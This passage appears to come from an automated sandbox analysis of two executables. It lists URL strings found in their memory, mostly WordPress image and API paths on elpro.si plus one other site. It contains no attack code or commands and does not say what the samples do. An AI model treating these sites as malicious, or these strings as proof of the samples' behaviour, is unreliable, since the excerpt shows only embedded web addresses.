                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Vlaga.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg)
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Eksplozivna-okolja.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/preloader.gif)
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-100x100.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-150x150.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-300x300.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-331x330.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-600x599.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-64x64.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-661x660.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-768x767.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-150x150.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-300x300.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-331x330.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-64x64.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-661x660.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-768x767.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-100x100.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-150x150.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-300x300.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-331x330.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-600x599.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-64x64.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-661x660.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-768x767.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-1170x658.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-1536x864.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-355x200.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-585x330.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-768x432.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica-355x200.jpeg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica-64x36.jpeg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica.jpeg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-100x100.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-300x300.jpg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/Untitled-design-2-355x200.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F&#038;format=xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/wp/v2/pages/2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/xmlrpc.php?rsd
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.599844768.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
